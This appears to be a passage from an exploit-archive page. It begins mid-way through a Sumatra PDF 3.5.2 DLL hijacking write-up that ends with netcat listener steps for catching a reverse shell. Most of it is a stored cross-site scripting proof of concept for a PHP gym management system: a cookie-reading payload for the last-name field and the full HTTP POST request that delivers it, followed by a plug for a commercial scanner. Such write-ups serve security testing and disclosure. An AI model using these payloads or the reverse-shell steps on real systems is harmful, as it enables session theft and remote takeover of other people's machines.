"C:\Users\<username>\AppData\Local\SumatraPDF")3. Start a listener via nc,nc -lvp 77774. Open Sumatra PDF application, and observe the execution of the reverse shell.Demo:https://drive.google.com/file/d/1-OMJ0ZvR9TYJEg_AwspRcGEAQvOLHJ41/view?usp=sharing

Sumatra PDF 3.5.2 DLL Hijacking

Gym Management System version 1.0 suffers from a persistent cross site scripting vulnerability. Original credit for this finding goes to Jyotsna Adhana in October of 2020 but uses a different vector of attack for this software version.

    # Exploit Title: GYM MS - GYM Management System - Cross Site Scripting (Stored)# Date: 29/09/2023# Vendor Homepage: https://phpgurukul.com/gym-management-system-using-php-and-mysql/# Software Link: https://phpgurukul.com/projects/GYM-Management-System-using-PHP.zip# Version: 1.0# Last Update: 31 August 2022# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30# 1: Create user, login and go to profile.php# 2: Use payload x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22 in lname field.# 3: When entering the profile.php page, document.cookie will be reflected every time.# AuthorThis vulnerability was detected by Alperen Yozgat while testing with the Rapplex - Web Application Security Scanner.# About RapplexRapplex is a web applicaton security scanner that scans and reports vulnerabilities in websites.Pentesters can use it as an automation tool for daily tasks but "Pentester Studio" will provide such a great addition as well in their manual assessments.So, the software does not need separate development tools to discover different types of vulnerabilities or to develop existing engines. "Exploit" tools are available to take advantage of vulnerabilities such as SQL Injection, Code Injection, Fle Incluson.# HTTP Request POST /gym/profile.php HTTP/1.1Host: localhostContent-Length: 129Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Cookie: PHPSESSID=76e2048c174c1a5d46e203df87672c25 #CHANGEConnection: closefname=test&lname=x%22%20onmouseover%3Dalert%28document.cookie%29%20x%3D%22&email=john%40test.com&mobile=1425635241&state=Delhi&city=New+Delhi&address=ABC+Street+XYZ+Colony&submit=Update

Tag

#windows